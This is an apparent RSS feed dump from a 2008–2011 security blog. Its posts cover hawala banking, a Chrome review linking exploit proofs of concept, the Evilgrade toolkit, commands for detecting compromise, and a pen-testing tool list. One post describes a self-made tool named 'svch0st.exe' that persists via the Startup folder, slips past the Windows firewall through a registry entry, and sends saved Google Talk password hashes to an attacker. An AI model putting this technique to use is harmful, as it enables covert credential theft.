mso-bidi-font-family:&quot;Times New Roman&quot;;  mso-bidi-theme-font:minor-bidi;} &lt;/style&gt; &lt;![endif]--&gt;    &lt;p class=&quot;MsoNormal&quot; style=&quot;line-height: normal;&quot;&gt;&lt;b&gt;&lt;span style=&quot;;font-family:&amp;quot;;font-size:13.5pt;&quot;  &gt;Black money is the curse of India shining. A dummy’s guide to informal banking &lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt; line-height: normal; font-family: times new roman;&quot;&gt;&lt;b&gt;&lt;span style=&quot;;font-family:&amp;quot;;font-size:12pt;&quot;  &gt;Source: Times Of India&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;;font-size:100%;&quot; &gt;&lt;br /&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;;font-size:100%;&quot; &gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;font-family: times new roman;&quot;&gt;    When the Directorate of Revenue Intelligence (DRI) detained Pakistani singer Rahat Fateh Ali Khan for allegedly carrying a huge amount of undeclared foreign exchange, it created “disorder” in India’s well-ordered hawala world. For years, hawala has been the preferred choice of traders, industrialists, criminals, drug lords and politicians. This is how they stash unaccounted currency in safe havens or conceal a tainted money trail. Deals are sealed cutting across continents, in cash, and no financial records are maintained. The operation is based on trust and is considered foolproof.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt; line-height: normal; font-family: times new roman; text-align: justify;&quot;&gt;&lt;span style=&quot;;font-size:100%;&quot; &gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;font-family: times new roman;&quot;&gt;    Khan’s detention has now put the spotlight on the hawala trail. In the last week, at least half-a-dozen Mumbai dealers were raided by revenue intelligence sleuths; more than Rs 60 lakh has been confiscated. Many traders have changed their phone numbers and gone underground.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: times new roman;&quot;&gt;    According to informal Enforcement Directorate estimates “at least 500 hawala dealers are operating in Delhi alone with a similar number in Mumbai, followed by Kolkata, Chennai and Hyderabad — which are significant among cities emerging as major business centres in the country.”&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: times new roman;&quot;&gt;    In fact, many believe that with its large transaction values and ability to transfer money rapidly, the hawala network is more widespread than India’s formal financial system. The magnitude of transactions could put some of the world’s biggest banks to shame. The monthly transactions executed by Delhi’s roughly 500 hawala operators is believed to be somewhere around Rs 30,000 crore or Rs 3,60,000 crore per annum. That’s almost as much as the government’s total direct tax collection in 2009-10 or nearly 6% of the country’s GDP that year. And that hypothetical calculation is only for Delhi!&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: times new roman;&quot;&gt;    Till a few years ago, New Delhi was the major centre for political hawala deals. But the presence of a multitude of enforcement agencies, forced them to move base to Kolkata. The quantum of money transferred from political bribes can be gauged from the fact that two of every 10 hawala operators are busy helping politicians stash away their ill-gotten wealth.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: times new roman;&quot;&gt;    Whilst on the trail of two such major kickbacks, income tax officials recently discovered Savage Island in New Zealand. On the tiny island, they found that Indians had opened banks with relatively small amounts of capital — sometimes, just Rs 4.5 lakh. The purpose of these banks appeared to be clear — entering into legitimate transactions with other financial institutions across the world. One of the many trails led to a political kickback of more than Rs 7,500 crore, which arrived at one of these Indianowned banks from a tax haven. The money was moved to another bank on Savage Island; eventually both banks were shut down, ending the trail.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: times new roman;&quot;&gt;    Another trail had a major Indian airline receiving money from a clutch of companies in Mauritius. Followed back, the trail led to a bank on Savage Island. The bank in question apparently received its last cheque from another bank on the same island. Before the bank authorities could be tracked down, both banks had ceased to exist.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: times new roman;&quot;&gt;    It was a classic case of the vanished hawala trail. Unsurprisingly, hawala traders are enormously rich. In February 2006, an income tax investigation found that Rs 1,540 crore of unaccounted money had been stashed at the Fatehpuri branch of the Federal Bank in Delhi. Three people, sans business antecedents, were responsible for the entire transaction. These&lt;/span&gt;&lt;/span&gt; agents were estimated to earn anywhere between Rs 5 and 10 crore each, every year. A similar drive in Maharashtra and Gujarat that year unearthed more than Rs 1,000 crore without any identifiable source. The modus operandi of these hawala dealers was identical. For domestic deals, they created bogus bills and discounted bank drafts on behalf of traders who dealt in cash. Or, they gave loans to industrialists in return for cash, charging them a commission of 1% of the total transaction. In offshore deals, money was delivered to people named by the beneficiary at any location in the world. The commission was a maximum of 2%.&lt;br /&gt;   Domestic hawala is small change compared to the big sums that politicians put away offshore. A big chunk of this money is received in tax havens such as the Isle of Man, British Virgin Islands, Switzerland, Dubai etc. The Central Board of Direct Taxes recently concluded a Tax Information Exchange Agreement with at least four offshore jurisdictions famous as tax havens — the Virgin Islands, Isle of Man, Bermuda and the Bahamas. It is trying to sign a similar agreement with 20 others. &lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt; line-height: normal;&quot;&gt;&lt;span style=&quot;;font-family:&amp;quot;;font-size:12pt;&quot;  &gt; &lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot; style=&quot;margin-bottom: 0.0001pt; line-height: normal;&quot;&gt;&lt;span style=&quot;;font-family:&amp;quot;;font-size:12pt;&quot;  &gt;  &lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt; &lt;/p&gt;</description><link>http://dark-computing.blogspot.com/2011/02/hawala-fine.html</link><author>noreply@blogger.com (Unknown)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4sDKZ46PylWfEm9si8eeWgONhdtS8jFcfJTNZm_JehuetMzllEwBXK6wVZT1BrUnyTE9gD-lq3jiS16JC_uxLkQ012ra8mWup4r5Hjn2bpubH_bpIJkTd4uIMO0tBi24TIBB9hvXeapc/s72-c/Untitled.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2217938988490451807.post-5625555450459108292</guid><pubDate>Thu, 04 Sep 2008 07:22:00 +0000</pubDate><atom:updated>2008-09-04T01:26:32.894-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Reviews</category><title>ReIgniting the War of the Browsers</title><description>&lt;div&gt;&lt;span class=&quot;Apple-style-span&quot;  style=&quot;font-family:&#39;trebuchet ms&#39;;&quot;&gt;&lt;div&gt;&lt;p class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot;  style=&quot; line-height: 55px;font-size:48px;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;MsoNormal&quot; style=&quot;mso-margin-top-alt:auto;mso-margin-bottom-alt:auto&quot;&gt;&lt;span class=&quot;Apple-style-span&quot;   style=&quot;  line-height: 55px;font-family:Arial;font-size:48px;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;MsoNormal&quot; style=&quot;mso-margin-top-alt:auto;mso-margin-bottom-alt:auto&quot;&gt;&lt;span class=&quot;Apple-style-span&quot;   style=&quot;color: rgb(186, 0, 13);   line-height: 55px;font-family:Arial;font-size:48px;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;MsoNormal&quot; style=&quot;mso-margin-top-alt:auto;mso-margin-bottom-alt:auto&quot;&gt;&lt;span class=&quot;Apple-style-span&quot;   style=&quot;color: rgb(14, 0, 16);   line-height: 55px;font-family:Arial;font-size:48px;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;MsoNormal&quot; style=&quot;mso-margin-top-alt:auto;mso-margin-bottom-alt:auto&quot;&gt;&lt;span class=&quot;Apple-style-span&quot;   style=&quot;color: rgb(255, 255, 255);   line-height: 55px;font-family:Arial;font-size:48px;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;MsoNormal&quot;&gt;&lt;span class=&quot;Apple-style-span&quot;  style=&quot; line-height: 55px;font-size:48px;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;With a new web browser entering the Internet Scene : Google Chrome and with Microsoft being already ready with Internet Explorer 8 Beta 2 the scene is definitely getting hot.Very soon both Firefox and Chrome would be ported for mobile devices as well.Both IE 8 and Google Chrome provide with Private browsing.Google calls it as Incognito mode.IE 8 auto deletes cookies and Temporary Internet Files as soon as you leave the Private Browsing mode.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;Google Chrome version 0.2.149.27&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;First View :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;1 ] Looks very feminine&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;2 ] Fast and&lt;span style=&quot;mso-spacerun:yes&quot;&gt;  &lt;/span&gt;Quick&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;3 ] Private Browsing - Incognito Pages&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;4 ] Has an advanced Gogole Chrome Task manager and memory statistics (about:memory)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;5 ] Good view-source:http://www.hp.com/ (View Source Option) with line numbers&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;6 ] Doesn&#39;t save webpages (full) as .mht but saves it like the legacy IE way.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;7 ] Has chrome-source (Inspect Element) option to examine every component on the page&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;8 ] Keeps on contacting im-YY-fXXX.google.com where X = some number and YY = country&lt;span style=&quot;mso-spacerun:yes&quot;&gt;      &lt;/span&gt;Short Prefix eg. im-uk-f123.google.com&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;9 ] On every GET request the User-Agent sent is&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;10] Has stolen &quot;Duplicate Tab&quot; option from opera but doesn&#39;t duplicate in the same window,&lt;span style=&quot;mso-spacerun:yes&quot;&gt;  &lt;/span&gt;instead opens a new Window&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;11] Lacks a good Full Screen View Option&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;There are already 2 publically disclosed bugs available to test for Chrome:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;Google Chrome Browser Automatic File Download - &lt;span class=&quot;Apple-style-span&quot; style=&quot;color: rgb(255, 102, 0);&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: rgb(255, 102, 0);&quot;&gt;http://www.milw0rm.com/exploits/6355&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;And Google Chrome Crashes with All Tabs - &lt;span class=&quot;Apple-style-span&quot; style=&quot;color: rgb(255, 153, 0);&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: rgb(255, 102, 0);&quot;&gt;http://evilfingers.com/advisory/google_chrome_poc.php&lt;/span&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;Google Chrome is available at :&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: rgb(255, 153, 0);&quot;&gt; &lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: rgb(255, 102, 0);&quot;&gt;http://www.google.com/chrome&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt; Microsoft Internet Explorer Beta 2 is available at :&lt;span style=&quot;mso-spacerun:yes&quot;&gt; &lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: rgb(255, 102, 0);&quot;&gt;http://www.microsoft.com/windows/internet-explorer/beta/&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: rgb(255, 102, 0);&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: rgb(255, 102, 0);&quot;&gt;http://www.microsoft.com/windows/internet-explorer/beta/worldwide-sites.aspx&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;Take your Pick !&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;line-height:115%;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;font-family:&amp;quot;;font-size:10.0pt;&quot;&gt;cr3d1t : q4k3rd00m3r&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;</description><link>http://dark-computing.blogspot.com/2008/09/reigniting-war-of-browsers.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2217938988490451807.post-1376387122108376584</guid><pubDate>Tue, 29 Jul 2008 11:49:00 +0000</pubDate><atom:updated>2008-07-29T04:58:53.676-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Links</category><title>Evilgrade - What Next ?</title><description>Francisco Amato of Infobyte Security Research just announced ISR-evilgrade v1.0.0, a toolkit for exploiting products which perform online updates in an insecure fashion. This tool works in conjunction with man-in-the-middle techniques (DNS, ARP, DHCP, etc) to exploit a wide variety applications. The &lt;a href=&quot;http://www.infobyte.com.ar/demo/evilgrade.htm&quot;&gt;demonstration video&lt;/a&gt; uses the CAU/Metasploit DNS exploit in conjunction with the Sun Java update mechanism to execute code on a fully patched Windows machine. For more information, see the README and slide deck. The first release includes exploits for Sun Java, Winzip, Winamp, Mac OS X, OpenOffice, iTunes, Linkedin Toolbar, DAP, Notepad++, and Speedbit&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.infobyte.com.ar/developments.htm&quot;&gt; http://www.infobyte.com.ar/developments.htm&lt;/a&gt;&lt;br /&gt;           &lt;a href=&quot;http://www.infobyte.com.ar/down/isr-evilgrade-Readme.txt&quot;&gt;http://www.infobyte.com.ar/down/isr-evilgrade-Readme.txt&lt;/a&gt;</description><link>http://dark-computing.blogspot.com/2008/07/evilgrade-last-nail-in-coffin.html</link><author>noreply@blogger.com (mango)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2217938988490451807.post-7444866684679705822</guid><pubDate>Wed, 18 Jun 2008 04:25:00 +0000</pubDate><atom:updated>2008-09-04T01:15:16.584-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Links</category><title>==== Google Talk and Password Saving Feature&#39;s Security ====</title><description>&lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;font-size:10.0pt;line-height:115%;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;&quot;&gt;Do you save Passwords ?&lt;br /&gt;&lt;br /&gt;This is a WRITEUP about Google Talk Application and its Password Saving facility.&lt;br /&gt;Tested on Google Talk 1.0.0.104 GTalk when set to save password, hashes and stores it like any other application for convenience but in a very secured manner.&lt;br /&gt;&lt;br /&gt;I&#39;ve developed a small application (Client-Server) which when executed by the target sends you its login name and hashed (/ encrypted) password string.When successfully dropped into and executed from C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ the application tricks Windows Firewall and doesn&#39;t ask with the unblock / cancel popup box.&lt;br /&gt;&lt;br /&gt;The application running on the attacker&#39;s end will obtain the hash sent to it and will display the hash string on its side. The attacker can then replace/create his password hash with the target&#39;s hash.After this, when the attacker launches Google Talk we expect the (asterisked) password to be the same as the target&#39;s.&lt;br /&gt;A password unhider tool can now aide the attacker to reveal (unmask) what the actual password of the target is.&lt;br /&gt; &lt;br /&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;font-size:10.0pt;line-height:115%;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;&quot;&gt;[ Demonstration ]&lt;br /&gt;&lt;span style=&quot;mso-spacerun:yes&quot;&gt; &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;font-size:10.0pt;line-height:115%;font-family: &amp;quot;Arial&amp;quot;,&amp;quot;sans-serif&amp;quot;&quot;&gt;&lt;span style=&quot;mso-spacerun:yes&quot;&gt; &lt;/span&gt;Save svch0st.exe(attached) to C:\Documents and Settings\All Users\Start Menu\Programs\Startup&lt;br /&gt;Execute CollectGTPass.exe(attached)&lt;br /&gt;- CollectGTPass.exe opens port 2803 on Localhost and will wait for signal from its Target/s (In our case the Target will connect to 127.0.0.1 since the Client and Server both are running on 127.0.0.1, locally) Note that the The target IP and Attacker Connection IP have been hardcoded in the exe since this is not a malware (trojan-tool) for everyone and is just for demonstration purpose.&lt;br /&gt;- In the demonstration video(attached) XP Firewall prompted for the CollectGTPass.exe (GPWS2.exe) and the application has been unblocked in the XP Firewall now.&lt;br /&gt;- When you will test this, Firewall won&#39;t popup any alert since the Target is connecting to loopback. In remote scenario, to avoid the alert svch0st.exe adds itself in List of AuthorisedApplications residing in HKLM before trying to connect remotely (Successfully Tested as shown in Video)&lt;br /&gt;- Execute svch0st.exe&lt;br /&gt;- svch0st.exe sends the encrypted password to Target:2803&lt;br /&gt;- CollectGTPass.exe will now receive the encrypted Password and will wait for the next one.&lt;br /&gt;- CollectGTPass waits forever to collect more password hashes from other sources.&lt;br /&gt;- This tool has been successfully tested to obtain a target&#39;s hash remotely both in a local network as well as over public IPs.&lt;br /&gt;- Screenshots and a Video of a successful local and remote respective retrieval attempt are attached.&lt;br /&gt;&lt;br /&gt;[ Question ]&lt;br /&gt;So does it work ? Do we get the Target&#39;s Password ?&lt;br /&gt;[ Answer ]&lt;br /&gt;NO !!&lt;br /&gt;We get the hash and using a password unmasking tool we view the password. &lt;br /&gt;But the hashing algorithm is still unknown to me.&lt;br /&gt;[ Moral of the Story ]&lt;br /&gt;Don&#39;t save passwords. Everything isn&#39;t GTalk.&lt;br /&gt;&lt;br /&gt;[ What&#39;s Next ? ]&lt;br /&gt;Skype.&lt;br /&gt;Video..&gt;&lt;a href=&quot;http://senduit.com/96f520&quot;&gt;&lt;span style=&quot;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: rgb(255, 102, 0);&quot;&gt;http://senduit.com/96f520&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;.:credit:. .=.QuakerD00mer.=.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;</description><link>http://dark-computing.blogspot.com/2008/06/google-talk-and-password-saving.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2217938988490451807.post-6397250663800174369</guid><pubDate>Tue, 03 Jun 2008 12:53:00 +0000</pubDate><atom:updated>2008-06-17T21:20:09.729-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Links</category><title>Built-in Windows commands to determine if a system has been hacked</title><description>&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;1) WMIC: A world of adventure awaits&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;C:\&gt; wmic process&lt;br /&gt;C:\&gt; wmic process list brief&lt;br /&gt;C:\&gt; wmic process list full&lt;br /&gt;C:\&gt; wmic startup list full&lt;br /&gt;C:\&gt; wmic process list brief /every:1&lt;br /&gt;Hitting CTRL+C will stop the cycle.&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-weight: bold;font-size:100%;&quot; &gt;2) The net command: An oldie but a goodie&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;3) Openfiles: Deep scrutiny&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;C:\&gt; openfiles /local on&lt;br /&gt;C:\&gt; openfiles /query /v&lt;br /&gt;C:\&gt; openfiles /local off&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;4) Netstat: Show me the network&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;C:\&gt; netstat -nao&lt;br /&gt;C:\&gt; netstat –s –p icmp&lt;br /&gt;C:\&gt; netstat –na 2&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;5) Find: Searching output for useful stuff&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;C:\&gt; wmic process list brief /every:1 | find &quot;cmd.exe&quot;&lt;br /&gt;C:\&gt; wmic startup list brief | find /i &quot;hklm&quot;&lt;br /&gt;&lt;span style=&quot;font-size:100%;&quot;&gt;&lt;br /&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;Researching output&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;With these five tools, users can get a great deal of information about the configuration and security state of a Windows machine. To use each command in identifying a compromise, however, a user needs to compare the current settings of the machine under analysis to a &quot;normal,&quot; uninfected machine.&lt;br /&gt;For detailed use of the commands and interpreting outputs read &lt;a href=&quot;http://searchsecurity.techtarget.com/tip/0,289483,sid14_gci1303709,00.html&quot;&gt;this&lt;/a&gt;</description><link>http://dark-computing.blogspot.com/2008/06/built-in-windows-commands-to-determine.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2217938988490451807.post-7007271246394205317</guid><pubDate>Fri, 30 May 2008 10:30:00 +0000</pubDate><atom:updated>2008-05-30T03:35:04.851-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Links</category><title>Pen_Testing_Tools.xls</title><description>One of the bigger challenges for anyone getting into penetration testing is the amount of tools available and their purpose in the overall penetration test.This excel sheet was the first step for me to get to know and understand the tools available for penetration testers. Each tools is grouped, ordered and rated (based on my own personal rating). This excel sheet also lists the website to download the tool and which OS/environment the tool runs under.The PenTools.xls file can be downloaded from the URL below, and is approximately 40KB&lt;br /&gt;&lt;a href=&quot;http://www.shanedevane.net/PenTools.xls&quot;&gt;http://www.shanedevane.net/PenTools.xls&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Taken from: &lt;a 